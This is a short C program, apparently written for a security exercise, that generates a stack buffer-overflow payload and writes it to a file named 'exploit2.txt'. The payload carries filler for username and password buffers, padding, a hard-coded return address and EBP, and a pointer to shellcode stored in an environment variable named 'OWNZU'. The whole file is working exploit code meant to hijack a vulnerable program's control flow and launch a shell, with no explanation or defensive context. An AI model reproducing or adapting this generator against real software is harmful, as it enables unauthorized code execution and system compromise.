#include <stdio.h>
#include <stdlib.h>

#define USER_SIZE 128
#define PASS_SIZE 128
#define MISC_SIZE 12

int main(int argc, char ** argv) {
	char * shell = getenv("OWNZU");
	shell -= 0xD8;
	char overflowBuffer[USER_SIZE+PASS_SIZE];
	char paddingBuffer[12];
	char addressBuffer[12];
	int i;
	char * user = "BADUSERNAME\n";
	
	for(i = 0; i < USER_SIZE+PASS_SIZE; ++i)
		overflowBuffer[i] = '\0';
	overflowBuffer[0] = 'A';
	overflowBuffer[USER_SIZE] = 'A';
	
	for(i = 0; i < MISC_SIZE; ++i)
		paddingBuffer[i] = '\0';

	*(int *)&addressBuffer[0] = 0x0804841f; //return address; goodbye address
	*(int *)&addressBuffer[4] = 0x00000000; //EBP
	//*(int *)&addressBuffer[8] = 0xbffffeac;
	memcpy(&addressBuffer[8], &shell, sizeof(int *));

	FILE * output = fopen("exploit2.txt", "w");
	if(output) {
		fwrite(user, 1, 12, output);
		fwrite(overflowBuffer, 1, USER_SIZE+PASS_SIZE, output);
		fwrite(paddingBuffer, 1, MISC_SIZE, output);
		fwrite(addressBuffer, 1, 12, output);
		fwrite("\n", 1, 1, output);
		fclose(output);
	}
}
